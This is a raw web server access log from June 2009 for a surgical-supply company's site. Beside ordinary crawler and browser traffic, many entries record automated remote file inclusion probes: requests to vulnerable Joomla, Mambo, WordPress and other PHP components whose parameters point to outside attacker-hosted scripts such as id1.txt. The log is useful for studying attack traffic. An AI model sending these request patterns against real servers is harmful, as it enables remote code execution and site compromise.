60.30.5.11 - - [22/Jun/2009:02:40:06 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; .NET CLR 1.1.4322)"
209.59.12.99 - - [22/Jun/2009:02:40:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
60.30.5.11 - - [22/Jun/2009:02:40:12 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; .NET CLR 1.1.4322)"
60.30.5.11 - - [22/Jun/2009:02:40:12 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; .NET CLR 1.1.4322)"
58.227.193.198 - - [22/Jun/2009:02:40:13 -0400] "GET //?path%5Bdocroot%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
58.227.193.198 - - [22/Jun/2009:02:40:13 -0400] "GET /logs/access_log.Q109051900%20%20//?path%5Bdocroot%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.227.193.198 - - [22/Jun/2009:02:40:13 -0400] "GET /logs//?path%5Bdocroot%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 200 6515 "-" "Mozilla/5.0"
58.227.193.198 - - [22/Jun/2009:02:40:13 -0400] "GET /logs/error_log.Q109051200%20%20//?path%5Bdocroot%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.249.71.54 - - [22/Jun/2009:02:40:17 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "-" "Googlebot-Image/1.0"
60.30.5.11 - - [22/Jun/2009:02:40:36 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; .NET CLR 1.1.4322)"
74.6.17.151 - - [22/Jun/2009:02:40:38 -0400] "GET /images/ACE_tutor_1Stage_Ridge.pdf HTTP/1.0" 200 1610345 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.94.155.59 - - [22/Jun/2009:02:41:31 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:41:31 -0400] "GET /logs/access_log.Q109061100//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:41:31 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.249.36.194 - - [22/Jun/2009:02:41:45 -0400] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://kudacuki.ucoz.com/id_superscan.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
203.94.155.59 - - [22/Jun/2009:02:41:46 -0400] "GET /logs/access_log.Q109061100//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:41:46 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:41:46 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:41:53 -0400] "GET /logs/access_log.Q109060300//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:42:00 -0400] "GET /logs/access_log.Q109060300//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
61.250.85.185 - - [22/Jun/2009:02:43:08 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
203.94.155.59 - - [22/Jun/2009:02:43:15 -0400] "GET /logs/access_log.Q109061100//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:43:15 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:43:15 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:43:22 -0400] "GET ///?sourcedir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:43:27 -0400] "GET /logs/access_log.Q109052100%20%20///?sourcedir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:43:27 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:43:29 -0400] "GET /logs///?sourcedir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 200 6516 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:43:29 -0400] "GET /logs/access_log.Q109060400%20%20///?sourcedir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:43:48 -0400] "GET /logs/access_log.Q109060300//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:43:54 -0400] "GET /logs/access_log.Q109061300//?path%5Bdocroot%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:44:10 -0400] "GET /logs/access_log.Q109052100///?sourcedir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.165.73.157 - - [22/Jun/2009:02:45:03 -0400] "GET /logs/access_log.Q109060200/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
121.165.73.157 - - [22/Jun/2009:02:45:03 -0400] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
121.165.73.157 - - [22/Jun/2009:02:45:03 -0400] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
209.59.12.99 - - [22/Jun/2009:02:45:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.165.73.157 - - [22/Jun/2009:02:45:46 -0400] "GET /logs/access_log.Q109061100/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
195.207.160.102 - - [22/Jun/2009:02:46:59 -0400] "GET //?path%5Bdocroot%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
195.207.160.102 - - [22/Jun/2009:02:46:59 -0400] "GET /logs/error_log.Q109051800%20%20//?path%5Bdocroot%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.207.160.102 - - [22/Jun/2009:02:46:59 -0400] "GET /logs//?path%5Bdocroot%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 200 6515 "-" "Mozilla/5.0"
195.207.160.102 - - [22/Jun/2009:02:47:05 -0400] "GET /logs/error_log.Q109053100%20%20//?path%5Bdocroot%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:02:47:18 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:02:47:18 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:02:47:18 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [22/Jun/2009:02:48:18 -0400] "GET //index.php?configFile=http://pusink.moy.su/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [22/Jun/2009:02:48:18 -0400] "GET /logs//index.php?configFile=http://pusink.moy.su/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [22/Jun/2009:02:48:18 -0400] "GET /logs/access_log.Q109052900//index.php?configFile=http://pusink.moy.su/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [22/Jun/2009:02:48:30 -0400] "GET //index.php?configFile=http://pusink.moy.su/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [22/Jun/2009:02:48:30 -0400] "GET /logs//index.php?configFile=http://pusink.moy.su/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [22/Jun/2009:02:48:30 -0400] "GET /logs/access_log.Q109052900//index.php?configFile=http://pusink.moy.su/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:02:48:39 -0400] "GET //index.php?configFile=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:02:48:39 -0400] "GET /logs//index.php?configFile=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:02:48:39 -0400] "GET /logs/access_log.Q109052900//index.php?configFile=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:49:07 -0400] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
58.227.193.198 - - [22/Jun/2009:02:49:08 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:49:13 -0400] "GET //skin/zero_vote/error.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:49:13 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:49:13 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
58.227.193.198 - - [22/Jun/2009:02:49:14 -0400] "GET /logs/access_log.Q109061300//?path%5Bdocroot%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:49:18 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:49:22 -0400] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:49:23 -0400] "GET /logs/access_log.Q109052100///?sourcedir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:02:49:43 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:02:50:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.94.155.59 - - [22/Jun/2009:02:50:29 -0400] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
116.125.126.72 - - [22/Jun/2009:02:51:10 -0400] "GET /logs/access_log.Q109052200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 287 "-" "libwww-perl/5.79"
222.72.138.238 - - [22/Jun/2009:02:52:11 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; CIBA; GreenBrowser)"
222.72.138.238 - - [22/Jun/2009:02:52:11 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; CIBA; GreenBrowser)"
195.34.78.110 - - [22/Jun/2009:02:52:12 -0400] "GET /logs/access_log.Q109052900%20%20//index.php?configFile=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.6.17.151 - - [22/Jun/2009:02:52:02 -0400] "GET /logs/access_log.Q109061300 HTTP/1.0" 200 2008810 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.72.138.238 - - [22/Jun/2009:02:52:18 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; CIBA; GreenBrowser)"
222.72.138.238 - - [22/Jun/2009:02:52:18 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; CIBA; GreenBrowser)"
203.94.155.59 - - [22/Jun/2009:02:52:25 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:52:25 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:52:33 -0400] "GET //skin/zero_vote/error.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:52:53 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:52:59 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:52:59 -0400] "GET //skin/zero_vote/error.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
58.227.193.198 - - [22/Jun/2009:02:53:10 -0400] "GET /logs/access_log.Q109051200//?path%5Bdocroot%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:53:17 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:02:53:37 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.189.18.73 - - [22/Jun/2009:02:54:45 -0400] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.189.18.73 - - [22/Jun/2009:02:54:45 -0400] "GET /logs/access_log.Q109052000/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.189.18.73 - - [22/Jun/2009:02:54:45 -0400] "GET /logs/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.189.18.73 - - [22/Jun/2009:02:54:48 -0400] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.189.18.73 - - [22/Jun/2009:02:54:48 -0400] "GET /logs/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.189.18.73 - - [22/Jun/2009:02:54:48 -0400] "GET /logs/access_log.Q109052000/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.189.18.73 - - [22/Jun/2009:02:54:49 -0400] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.189.18.73 - - [22/Jun/2009:02:54:49 -0400] "GET /logs/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.189.18.73 - - [22/Jun/2009:02:54:49 -0400] "GET /logs/access_log.Q109052000/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:02:55:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [22/Jun/2009:02:57:11 -0400] "GET /logs/access_log.Q109052900%20%20//index.php?configFile=http://pusink.moy.su/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:02:57:44 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:02:57:44 -0400] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:02:57:44 -0400] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:02:57:54 -0400] "GET /logs/access_log.Q109060300//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
209.172.33.230 - - [22/Jun/2009:02:58:07 -0400] "GET //index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.172.33.230 - - [22/Jun/2009:02:58:07 -0400] "GET /logs/access_log.Q109061400//index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.172.33.230 - - [22/Jun/2009:02:58:07 -0400] "GET /logs//index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.172.33.230 - - [22/Jun/2009:02:58:09 -0400] "GET //index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.172.33.230 - - [22/Jun/2009:02:58:09 -0400] "GET /logs//index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.172.33.230 - - [22/Jun/2009:02:58:09 -0400] "GET /logs/access_log.Q109061400//index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.172.33.230 - - [22/Jun/2009:02:58:12 -0400] "GET /logs//index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.172.33.230 - - [22/Jun/2009:02:58:12 -0400] "GET /logs/access_log.Q109061400//index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.172.33.230 - - [22/Jun/2009:02:58:17 -0400] "GET //index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.207.160.102 - - [22/Jun/2009:02:58:32 -0400] "GET /logs/error_log.Q108052600%20%20/?sourcedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.172.33.230 - - [22/Jun/2009:02:58:39 -0400] "GET /logs/access_log.Q109061400%20%20//index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
82.194.87.219 - - [22/Jun/2009:02:58:40 -0400] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 266 "-" "libwww-perl/5.822"
74.53.70.114 - - [22/Jun/2009:02:58:48 -0400] "GET /logs/errors.php?error=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:02:58:48 -0400] "GET /errors.php?error=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:02:58:48 -0400] "GET /logs/access_log.Q109050800/errors.php?error=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.221.37.118 - - [22/Jun/2009:02:59:23 -0400] "GET //index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.0" 404 208 "-" "Mozilla/5.0"
66.221.37.118 - - [22/Jun/2009:02:59:23 -0400] "GET /logs//index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
66.221.37.118 - - [22/Jun/2009:02:59:23 -0400] "GET /logs/access_log.Q109061400//index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
211.189.18.73 - - [22/Jun/2009:02:59:38 -0400] "GET /logs/access_log.Q109052000%20%20/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:59:40 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.189.18.73 - - [22/Jun/2009:02:59:44 -0400] "GET /logs/access_log.Q109052000%20%20/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
88.191.89.138 - - [22/Jun/2009:02:59:45 -0400] "GET //index.php?p=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
88.191.89.138 - - [22/Jun/2009:02:59:45 -0400] "GET /logs//index.php?p=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
88.191.89.138 - - [22/Jun/2009:02:59:45 -0400] "GET /logs/access_log.Q109061400//index.php?p=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.189.18.73 - - [22/Jun/2009:02:59:45 -0400] "GET /logs/access_log.Q109052000%20%20/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.172.33.230 - - [22/Jun/2009:03:00:03 -0400] "GET /logs/access_log.Q109050800%20%20//index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.172.33.230 - - [22/Jun/2009:03:00:04 -0400] "GET /logs/access_log.Q109061400%20%20//index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.172.33.230 - - [22/Jun/2009:03:00:05 -0400] "GET /logs/access_log.Q109061400%20%20//index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:03:00:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.189.18.73 - - [22/Jun/2009:03:00:15 -0400] "GET /logs/access_log.Q109051500%20%20/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
88.191.89.138 - - [22/Jun/2009:03:00:16 -0400] "GET /logs/access_log.Q109061400%20%20//index.php?p=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.189.18.73 - - [22/Jun/2009:03:00:26 -0400] "GET /logs/access_log.Q109051500%20%20/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.189.18.73 - - [22/Jun/2009:03:00:27 -0400] "GET /logs/access_log.Q109051500%20%20/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
82.194.87.219 - - [22/Jun/2009:03:00:28 -0400] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 266 "-" "libwww-perl/5.822"
